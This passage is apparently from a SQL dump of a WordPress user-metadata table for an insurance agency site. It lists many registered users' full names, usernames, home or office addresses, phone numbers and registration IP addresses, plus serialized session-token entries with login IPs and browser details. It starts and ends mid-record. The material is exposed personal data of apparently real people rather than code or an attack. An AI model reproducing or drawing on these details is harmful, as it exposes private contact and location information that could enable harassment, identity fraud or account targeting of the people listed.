States'),(838,31,'phone1','845-216-1630'),(841,31,'wpmem_reg_ip','69.127.155.125'),(844,31,'wpmem_reg_url','http://www.empireins.com/carriers/'),(847,31,'active','1'),(848,31,'session_tokens','a:1:{s:64:\"93c48d757799b7941f28ba9ef7cc3794ec4c1002113852ad5a0f4f7a348d1a98\";a:4:{s:10:\"expiration\";i:1453137928;s:2:\"ip\";s:14:\"69.127.155.125\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1451928328;}}'),(850,34,'nickname','asimcha'),(853,34,'first_name','abraham'),(856,34,'last_name','moskovits'),(859,34,'description',''),(862,34,'rich_editing','true'),(865,34,'comment_shortcuts','false'),(868,34,'admin_color','sunrise'),(871,34,'use_ssl','0'),(874,34,'show_admin_bar_front','true'),(877,34,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(880,34,'wp_user_level','0'),(883,34,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(886,34,'addr1','10 joan lane'),(889,34,'addr2',''),(892,34,'city','monsey'),(895,34,'thestate','NY'),(898,34,'zip','10952'),(901,34,'country','usa'),(904,34,'phone1','845-402-0091'),(907,34,'wpmem_reg_ip','108.21.81.67'),(910,34,'wpmem_reg_url','http://www.empireins.com/carriers/'),(913,34,'tos',''),(916,34,'active','1'),(920,34,'session_tokens','a:1:{s:64:\"de162cce759043bf525d80e84f5d10c9388db707485f7838a88f776669fa694d\";a:4:{s:10:\"expiration\";i:1452109735;s:2:\"ip\";s:12:\"108.21.81.67\";s:2:\"ua\";s:103:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1451936935;}}'),(923,35,'nickname','jaynylic1'),(926,35,'first_name','Joseph'),(929,35,'last_name','Spira'),(932,35,'description',''),(935,35,'rich_editing','true'),(938,35,'comment_shortcuts','false'),(941,35,'admin_color','fresh'),(944,35,'use_ssl','0'),(947,35,'show_admin_bar_front','true'),(950,35,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(953,35,'wp_user_level','0'),(956,35,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(959,35,'addr1','1363 40 St'),(962,35,'addr2',''),(965,35,'city','brooklyn'),(968,35,'thestate','ny'),(971,35,'zip','11218'),(974,35,'country','usa'),(977,35,'phone1','917-776-5607'),(980,35,'wpmem_reg_ip','69.112.101.64'),(983,35,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(985,35,'tos',''),(988,35,'active','1'),(991,37,'nickname','dbraver'),(994,37,'first_name','David'),(997,37,'last_name','Braver'),(1000,37,'description',''),(1003,37,'rich_editing','true'),(1006,37,'comment_shortcuts','false'),(1009,37,'admin_color','fresh'),(1012,37,'use_ssl','0'),(1015,37,'show_admin_bar_front','true'),(1018,37,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1021,37,'wp_user_level','0'),(1024,37,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1027,37,'addr1','38 Skillman St'),(1030,37,'addr2',''),(1033,37,'city','Brooklyn'),(1036,37,'thestate','NY'),(1039,37,'zip','11205'),(1042,37,'country','USA'),(1045,37,'phone1','7182189647'),(1048,37,'wpmem_reg_ip','108.58.88.178'),(1051,37,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(1052,37,'tos',''),(1055,37,'active','1'),(1061,38,'nickname','Nkadin'),(1064,38,'first_name','Nachum'),(1067,38,'last_name','Kadin'),(1070,38,'description',''),(1073,38,'rich_editing','true'),(1076,38,'comment_shortcuts','false'),(1079,38,'admin_color','fresh'),(1082,38,'use_ssl','0'),(1085,38,'show_admin_bar_front','true'),(1088,38,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1091,38,'wp_user_level','0'),(1094,38,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1097,38,'addr1','871 East 12 Street'),(1100,38,'addr2','Suite 200'),(1103,38,'city','Brooklyn'),(1106,38,'thestate','NEW YORK'),(1109,38,'zip','11230'),(1112,38,'country','United States'),(1115,38,'phone1','7189861588'),(1118,38,'wpmem_reg_ip','69.164.135.61'),(1121,38,'wpmem_reg_url','http://www.empireins.com/forms/'),(1123,40,'nickname','ipipeadmin'),(1126,40,'first_name','ipipeline'),(1129,40,'last_name','admin'),(1132,40,'description',''),(1135,40,'rich_editing','true'),(1138,40,'comment_shortcuts','false'),(1141,40,'admin_color','fresh'),(1144,40,'use_ssl','0'),(1147,40,'show_admin_bar_front','true'),(1150,40,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1153,40,'wp_user_level','0'),(1156,40,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1159,40,'addr1',''),(1162,40,'addr2',''),(1165,40,'city',''),(1168,40,'thestate',''),(1171,40,'zip',''),(1174,40,'country',''),(1177,40,'phone1',''),(1180,40,'active','1'),(1183,40,'tos',''),(1186,40,'session_tokens','a:1:{s:64:\"048682293d2b892434a16b840cf05f2da87881f5e9d38364eb21c68d169d43cb\";a:4:{s:10:\"expiration\";i:1452179527;s:2:\"ip\";s:14:\"68.134.205.181\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko\";s:5:\"login\";i:1452006727;}}'),(1189,43,'nickname','ipipelineadmin'),(1192,43,'first_name','ipipe'),(1195,43,'last_name','admin'),(1198,43,'description',''),(1201,43,'rich_editing','true'),(1204,43,'comment_shortcuts','false'),(1207,43,'admin_color','fresh'),(1210,43,'use_ssl','0'),(1213,43,'show_admin_bar_front','true'),(1216,43,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1219,43,'wp_user_level','0'),(1222,43,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1225,43,'addr1',''),(1228,43,'addr2',''),(1231,43,'city',''),(1234,43,'thestate',''),(1237,43,'zip',''),(1240,43,'country',''),(1243,43,'phone1',''),(1244,43,'active','1'),(1247,43,'tos',''),(1252,38,'tos',''),(1255,38,'active','1'),(1258,46,'nickname','peritest'),(1261,46,'first_name','hgfirst'),(1264,46,'last_name','hglast'),(1267,46,'description',''),(1270,46,'rich_editing','true'),(1273,46,'comment_shortcuts','false'),(1276,46,'admin_color','fresh'),(1279,46,'use_ssl','0'),(1282,46,'show_admin_bar_front','true'),(1285,46,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1288,46,'wp_user_level','0'),(1291,46,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1294,46,'addr1','123 main st'),(1297,46,'addr2',''),(1300,46,'city','city'),(1303,46,'thestate','Co'),(1306,46,'zip','80303'),(1309,46,'country','United States'),(1312,46,'phone1','4102676777'),(1314,46,'active','1'),(1315,46,'tos',''),(1317,46,'session_tokens','a:1:{s:64:\"efcd17a8b8f6cf9edf37717931fd54909d6f289d9dd49572cc4e52beb94231d8\";a:4:{s:10:\"expiration\";i:1452191764;s:2:\"ip\";s:14:\"68.134.205.181\";s:2:\"ua\";s:83:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko\";s:5:\"login\";i:1452018964;}}'),(1323,48,'nickname','yepstein22'),(1326,48,'first_name','sarah'),(1329,48,'last_name','epstein'),(1332,48,'description',''),(1335,48,'rich_editing','true'),(1338,48,'comment_shortcuts','false'),(1341,48,'admin_color','fresh'),(1344,48,'use_ssl','0'),(1347,48,'show_admin_bar_front','true'),(1350,48,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1353,48,'wp_user_level','0'),(1356,48,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1359,48,'addr1','2 schunnemunk #203'),(1362,48,'addr2',''),(1365,48,'city','monroe'),(1368,48,'thestate','ny'),(1371,48,'zip','10950'),(1374,48,'country','orange'),(1377,48,'phone1','845 783 5731'),(1380,48,'wpmem_reg_ip','65.73.128.6'),(1383,48,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(1384,48,'active','1'),(1386,48,'session_tokens','a:2:{s:64:\"50472277507fc6f30ecb1e36ba6f340be4e8335a0eeb5ca314f3ac6bdabe89c2\";a:4:{s:10:\"expiration\";i:1453482513;s:2:\"ip\";s:12:\"65.73.133.28\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\";s:5:\"login\";i:1453309713;}s:64:\"68e679269dc92b72dca4c4fc58393e659547cfef886c2f2dbad8e260f3811b12\";a:4:{s:10:\"expiration\";i:1453482572;s:2:\"ip\";s:12:\"65.73.133.28\";s:2:\"ua\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\";s:5:\"login\";i:1453309772;}}'),(1389,51,'nickname','abrahammermelstein'),(1392,51,'first_name','Abraham'),(1395,51,'last_name','Mermelstein'),(1398,51,'description',''),(1401,51,'rich_editing','true'),(1404,51,'comment_shortcuts','false'),(1407,51,'admin_color','fresh'),(1410,51,'use_ssl','0'),(1413,51,'show_admin_bar_front','true'),(1416,51,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1419,51,'wp_user_level','0'),(1422,51,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1425,51,'addr1','821 Kent ave'),(1428,51,'addr2',''),(1431,51,'city','Brooklyn'),(1434,51,'thestate','NY'),(1437,51,'zip','11205'),(1440,51,'country','USA'),(1443,51,'phone1','7185990220'),(1446,51,'wpmem_reg_ip','208.125.14.78'),(1449,51,'wpmem_reg_url','http://www.empireins.com/insentives/'),(1452,54,'nickname','jreich321'),(1455,54,'first_name','Jay'),(1458,54,'last_name','Reich'),(1461,54,'description',''),(1464,54,'rich_editing','true'),(1467,54,'comment_shortcuts','false'),(1470,54,'admin_color','fresh'),(1473,54,'use_ssl','0'),(1476,54,'show_admin_bar_front','true'),(1479,54,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1482,54,'wp_user_level','0'),(1485,54,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1488,54,'addr1','270 Wallabout STreet'),(1491,54,'addr2',''),(1494,54,'city','Brooklyn'),(1497,54,'thestate','NY'),(1500,54,'zip','11206'),(1503,54,'country','usa'),(1506,54,'phone1','9176201664'),(1509,54,'wpmem_reg_ip','74.65.193.76'),(1512,54,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(1513,38,'session_tokens','a:1:{s:64:\"724e6740677c1caa7039c6a5f588ebea8c20beec1f99f48fd459ac86ad4f16d2\";a:4:{s:10:\"expiration\";i:1460239057;s:2:\"ip\";s:14:\"69.114.209.224\";s:2:\"ua\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\";s:5:\"login\";i:1460066257;}}'),(1515,51,'tos',''),(1518,51,'active','1'),(1521,54,'tos',''),(1524,54,'active','1'),(1527,51,'session_tokens','a:1:{s:64:\"6c9a7ee6705c55dde3a9b10204a75f3dbd99a58e11b451137a3f79afcb330e9b\";a:4:{s:10:\"expiration\";i:1460650128;s:2:\"ip\";s:13:\"208.125.14.78\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\";s:5:\"login\";i:1460477328;}}'),(1530,38,'bgusername','Nkadin'),(1531,16,'bgusername','cbraver'),(1537,51,'wp_user-settings','mfold=f'),(1540,51,'wp_user-settings-time','1452112725'),(1542,57,'nickname','akepecs'),(1545,57,'first_name','abraham'),(1548,57,'last_name','kepecs'),(1551,57,'description',''),(1554,57,'rich_editing','true'),(1557,57,'comment_shortcuts','false'),(1560,57,'admin_color','fresh'),(1563,57,'use_ssl','0'),(1566,57,'show_admin_bar_front','true'),(1569,57,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1572,57,'wp_user_level','0'),(1575,57,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1578,57,'addr1','2 skillman st'),(1581,57,'addr2','suite 305'),(1584,57,'city','brooklyn'),(1587,57,'thestate','ny'),(1590,57,'zip','11205'),(1593,57,'country','usa'),(1596,57,'phone1','718-534-7418'),(1599,57,'wpmem_reg_ip','24.186.240.34'),(1602,57,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(1603,57,'active','1'),(1605,57,'session_tokens','a:5:{s:64:\"6afe31bbf5b363e641b1d005e3d708d6c2b5e10d856e277807c72cb3613880b2\";a:4:{s:10:\"expiration\";i:1462395098;s:2:\"ip\";s:13:\"24.186.240.34\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462222298;}s:64:\"5fe735365ee586dc309478fa1df8c901e452f22fa341b69a7667ca83d77cdb05\";a:4:{s:10:\"expiration\";i:1462397435;s:2:\"ip\";s:13:\"24.186.240.34\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462224635;}s:64:\"989abd8be42e45c96ff98aa05fdc2ac0a6221bf391273ab96356c52930cd80a8\";a:4:{s:10:\"expiration\";i:1463435003;s:2:\"ip\";s:13:\"24.186.240.34\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462225403;}s:64:\"f90797f3d62ad6d40722c25d0e92d3087bcf4aed0f77630d56b81f058d2dc449\";a:4:{s:10:\"expiration\";i:1462400379;s:2:\"ip\";s:13:\"24.186.240.34\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1462227579;}s:64:\"1d1b71a5d7a84717610a48f2df5c324e53d4fcaf49bc392bb90196d76fbdcbfc\";a:4:{s:10:\"expiration\";i:1462408366;s:2:\"ip\";s:13:\"24.186.240.34\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1462235566;}}'),(1606,58,'nickname','throop0715'),(1609,58,'first_name','Aaron'),(1612,58,'last_name','Grosz'),(1615,58,'description',''),(1618,58,'rich_editing','true'),(1621,58,'comment_shortcuts','false'),(1624,58,'admin_color','fresh'),(1627,58,'use_ssl','0'),(1630,58,'show_admin_bar_front','true'),(1633,58,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1636,58,'wp_user_level','0'),(1639,58,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1642,58,'addr1','49 throop ave'),(1645,58,'addr2',''),(1648,58,'city','brooklyn'),(1651,58,'thestate','ny'),(1654,58,'zip','11206'),(1657,58,'country','usa'),(1660,58,'phone1','9174740715'),(1663,58,'wpmem_reg_ip','24.213.178.195'),(1666,58,'wpmem_reg_url','http://www.empireins.com/forms/'),(1669,58,'tos',''),(1672,58,'bgusername','throop0715'),(1675,58,'active','0'),(1679,59,'nickname','DavidGlick'),(1682,59,'first_name','David'),(1685,59,'last_name','Glick'),(1688,59,'description',''),(1691,59,'rich_editing','true'),(1694,59,'comment_shortcuts','false'),(1697,59,'admin_color','fresh'),(1700,59,'use_ssl','0'),(1703,59,'show_admin_bar_front','true'),(1706,59,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1709,59,'wp_user_level','0'),(1712,59,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1715,59,'addr1','23 Robert Pitt Drive'),(1718,59,'addr2','Suite 104'),(1721,59,'city','Monsey'),(1724,59,'thestate','NY'),(1727,59,'zip','10952'),(1730,59,'country','USA'),(1733,59,'phone1','845-262-0085'),(1736,59,'wpmem_reg_ip','108.41.135.17'),(1739,59,'wpmem_reg_url','http://www.empireins.com/forms/'),(1741,59,'tos',''),(1744,59,'bgusername','DavidGlick'),(1747,59,'active','1'),(1748,59,'session_tokens','a:3:{s:64:\"0c51f1e88648335b1f31a9eb3e2c0921b631c77f181d2879bf15497ebd72063e\";a:4:{s:10:\"expiration\";i:1452449017;s:2:\"ip\";s:13:\"108.41.135.17\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452276217;}s:64:\"281056463791c58922b01bc8e392f4ca544c54c8acf928210b477c71c40b0700\";a:4:{s:10:\"expiration\";i:1452449042;s:2:\"ip\";s:13:\"108.41.135.17\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452276242;}s:64:\"2c499a7d0c63410e483c2de9fff5dbe780c969ac8f1fca12fda0868f9a28a0fc\";a:4:{s:10:\"expiration\";i:1452449051;s:2:\"ip\";s:13:\"108.41.135.17\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452276251;}}'),(1750,61,'nickname','fntime55'),(1753,61,'first_name','Mordechai'),(1756,61,'last_name','schwinder'),(1759,61,'description',''),(1762,61,'rich_editing','true'),(1765,61,'comment_shortcuts','false'),(1768,61,'admin_color','fresh'),(1771,61,'use_ssl','0'),(1774,61,'show_admin_bar_front','true'),(1777,61,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1780,61,'wp_user_level','0'),(1783,61,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1786,61,'addr1','1273 Cambria ct'),(1789,61,'addr2',''),(1792,61,'city','Lakewood'),(1795,61,'thestate','New Jersey'),(1798,61,'zip','08701'),(1801,61,'country','usa'),(1804,61,'phone1','7322822143'),(1807,61,'wpmem_reg_ip','108.58.164.26'),(1810,61,'wpmem_reg_url','http://www.empireins.com/register/'),(1811,61,'tos',''),(1814,61,'bgusername','fntime55'),(1817,61,'active','1'),(1820,62,'nickname','gsteinmetz10235'),(1823,62,'first_name','Gitty'),(1826,62,'last_name','Steinmetz'),(1829,62,'description',''),(1832,62,'rich_editing','true'),(1835,62,'comment_shortcuts','false'),(1838,62,'admin_color','fresh'),(1841,62,'use_ssl','0'),(1844,62,'show_admin_bar_front','true'),(1847,62,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1850,62,'wp_user_level','0'),(1853,62,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1856,62,'addr1','172 rutledge St'),(1859,62,'addr2',''),(1862,62,'city','Brooklyn'),(1865,62,'thestate','ny'),(1868,62,'zip','11211'),(1871,62,'country','us'),(1874,62,'phone1','3472711149'),(1877,62,'wpmem_reg_ip','67.244.116.42'),(1880,62,'wpmem_reg_url','http://www.empireins.com/members/'),(1882,61,'session_tokens','a:1:{s:64:\"83103e1254dc8704177b3beb286d341b03f5ce364abf5baa31203657e754a230\";a:4:{s:10:\"expiration\";i:1460586462;s:2:\"ip\";s:13:\"108.58.164.26\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1460413662;}}'),(1885,64,'nickname','gsteinmetz12486'),(1888,64,'first_name','gitty'),(1891,64,'last_name','Steinmetz'),(1894,64,'description',''),(1897,64,'rich_editing','true'),(1900,64,'comment_shortcuts','false'),(1903,64,'admin_color','fresh'),(1906,64,'use_ssl','0'),(1909,64,'show_admin_bar_front','true'),(1912,64,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1915,64,'wp_user_level','0'),(1918,64,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1921,64,'addr1','172 rutledge St'),(1924,64,'addr2',''),(1927,64,'city','Brooklyn'),(1930,64,'thestate','ny'),(1933,64,'zip','11211'),(1936,64,'country','United States'),(1939,64,'phone1','3472711149'),(1942,64,'wpmem_reg_ip','67.244.116.42'),(1945,64,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(1946,62,'tos',''),(1949,62,'bgusername','gsteinmetz10235'),(1952,62,'active','1'),(1955,62,'session_tokens','a:2:{s:64:\"b62dc53e96cafa56fe16964ec6264016e97107a665a6fa25182f20bf4055b8d0\";a:4:{s:10:\"expiration\";i:1452624310;s:2:\"ip\";s:13:\"67.244.116.42\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452451510;}s:64:\"b94313a616774fb4f42649fa8c19bed1f3718feb24101e54e360f4ce8aa088b8\";a:4:{s:10:\"expiration\";i:1452624310;s:2:\"ip\";s:13:\"67.244.116.42\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452451510;}}'),(1958,54,'session_tokens','a:2:{s:64:\"237538f16d693e9a76a3723ef35d853483de8d009ec743c76bd39c4a29eb03f7\";a:4:{s:10:\"expiration\";i:1452641543;s:2:\"ip\";s:12:\"74.65.193.76\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452468743;}s:64:\"7aa810f3810919ebb6d9f473fdad793a5e2cad1418186d8c77bf19b4f23bc5a9\";a:4:{s:10:\"expiration\";i:1452729162;s:2:\"ip\";s:12:\"74.65.193.76\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452556362;}}'),(1960,67,'nickname','Shmuli'),(1963,67,'first_name','Shmuel'),(1966,67,'last_name','Wolvovsky'),(1969,67,'description',''),(1972,67,'rich_editing','true'),(1975,67,'comment_shortcuts','false'),(1978,67,'admin_color','fresh'),(1981,67,'use_ssl','0'),(1984,67,'show_admin_bar_front','true'),(1987,67,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(1990,67,'wp_user_level','0'),(1993,67,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(1996,67,'addr1','134 Broadway'),(1999,67,'addr2',''),(2002,67,'city','Brooklyn'),(2005,67,'thestate','NY'),(2008,67,'zip','11249'),(2011,67,'country','USA'),(2014,67,'phone1','7183028676'),(2017,67,'wpmem_reg_ip','24.213.178.195'),(2020,67,'wpmem_reg_url','http://www.empireins.com/forms/'),(2021,67,'tos',''),(2024,67,'bgusername','Shmuli'),(2027,67,'active','1'),(2032,70,'nickname','fully10952'),(2035,70,'first_name','raphael'),(2038,70,'last_name','freund'),(2041,70,'description',''),(2044,70,'rich_editing','true'),(2047,70,'comment_shortcuts','false'),(2050,70,'admin_color','fresh'),(2053,70,'use_ssl','0'),(2056,70,'show_admin_bar_front','true'),(2059,70,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2062,70,'wp_user_level','0'),(2065,70,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2068,70,'addr1','199 lee ave. Unit 654'),(2071,70,'addr2',''),(2074,70,'city','brooklyn'),(2077,70,'thestate','ny'),(2080,70,'zip','11211'),(2083,70,'country','usa'),(2086,70,'phone1','9177471063'),(2089,70,'wpmem_reg_ip','108.29.136.102'),(2092,70,'wpmem_reg_url','http://www.empireins.com/members/'),(2095,70,'tos',''),(2098,70,'bgusername','fully10952'),(2101,70,'active','1'),(2102,70,'session_tokens','a:1:{s:64:\"5b2063afa4aaf6c448afd1919055eabcfb8a6e806372bea0b3d1c61d27e8c1cd\";a:4:{s:10:\"expiration\";i:1463164650;s:2:\"ip\";s:14:\"108.29.136.102\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462991850;}}'),(2107,73,'nickname','yitzchok'),(2110,73,'first_name','Yitzchok'),(2113,73,'last_name','Lebovits'),(2116,73,'description',''),(2119,73,'rich_editing','true'),(2122,73,'comment_shortcuts','false'),(2125,73,'admin_color','fresh'),(2128,73,'use_ssl','0'),(2131,73,'show_admin_bar_front','true'),(2134,73,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2137,73,'wp_user_level','0'),(2140,73,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2143,73,'addr1','7 Leon Drive'),(2146,73,'addr2',''),(2149,73,'city','Monsey'),(2152,73,'thestate','NY'),(2155,73,'zip','10952'),(2158,73,'country','USA'),(2161,73,'phone1','845-538-7716'),(2164,73,'wpmem_reg_ip','96.250.55.170'),(2167,73,'wpmem_reg_url','http://www.empireins.com/register/'),(2168,73,'tos',''),(2171,73,'bgusername','yitzchok'),(2174,73,'active','1'),(2177,73,'session_tokens','a:1:{s:64:\"0959c375cfe77cf6e84fa1b38d135b1558d0fce868323f8c908e225bc80f0a42\";a:4:{s:10:\"expiration\";i:1457577418;s:2:\"ip\";s:13:\"96.250.55.170\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1457404618;}}'),(2180,58,'session_tokens','a:1:{s:64:\"cc2456ecb4236a5d3334c3385e66db294acfef2904f1e979595f948be5d2ed35\";a:4:{s:10:\"expiration\";i:1452717097;s:2:\"ip\";s:14:\"104.246.54.244\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36\";s:5:\"login\";i:1452544297;}}'),(2183,74,'nickname','Isaacd'),(2186,74,'first_name','Isaac'),(2189,74,'last_name','Deutsch'),(2192,74,'description',''),(2195,74,'rich_editing','true'),(2198,74,'comment_shortcuts','false'),(2201,74,'admin_color','fresh'),(2204,74,'use_ssl','0'),(2207,74,'show_admin_bar_front','true'),(2210,74,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2213,74,'wp_user_level','0'),(2216,74,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2219,74,'addr1','207 lee ave'),(2222,74,'addr2',''),(2225,74,'city','Brooklyn'),(2228,74,'thestate','ny'),(2231,74,'zip','11206'),(2234,74,'country','us'),(2237,74,'phone1','347-683-2972'),(2240,74,'wpmem_reg_ip','184.152.70.9'),(2243,74,'wpmem_reg_url','http://www.empireins.com/register/'),(2245,74,'tos',''),(2248,74,'bgusername','Isaacd'),(2251,74,'active','1'),(2254,74,'session_tokens','a:1:{s:64:\"5e47d2cd337ab8f2e3c0faa3ad4fbdab572300e517c374e3b51360e4f9dfddfa\";a:4:{s:10:\"expiration\";i:1463196646;s:2:\"ip\";s:11:\"74.72.46.87\";s:2:\"ua\";s:61:\"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1463023846;}}'),(2257,76,'nickname','mfrankel'),(2260,76,'first_name','mendel'),(2263,76,'last_name','frankel'),(2266,76,'description',''),(2269,76,'rich_editing','true'),(2272,76,'comment_shortcuts','false'),(2275,76,'admin_color','fresh'),(2278,76,'use_ssl','0'),(2281,76,'show_admin_bar_front','true'),(2284,76,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2287,76,'wp_user_level','0'),(2290,76,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2293,76,'addr1','416- bedford ave'),(2296,76,'addr2',''),(2299,76,'city','brooklyn'),(2302,76,'thestate','ny'),(2305,76,'zip','11249'),(2308,76,'country','usa'),(2311,76,'phone1','7183620215'),(2314,76,'wpmem_reg_ip','209.64.152.62'),(2317,76,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(2320,76,'tos',''),(2323,76,'bgusername','mfrankel'),(2326,76,'active','1'),(2327,76,'session_tokens','a:1:{s:64:\"18592c2b13c1e9ee35d7cdeb057a2faea8851a48e08c0f209c1807ed47f169c2\";a:4:{s:10:\"expiration\";i:1458420182;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\";s:5:\"login\";i:1458247382;}}'),(2329,79,'nickname','sadolf'),(2332,79,'first_name','shlomo'),(2335,79,'last_name','Adolf'),(2338,79,'description',''),(2341,79,'rich_editing','true'),(2344,79,'comment_shortcuts','false'),(2347,79,'admin_color','fresh'),(2350,79,'use_ssl','0'),(2353,79,'show_admin_bar_front','true'),(2356,79,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2359,79,'wp_user_level','0'),(2362,79,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2365,79,'addr1','1619 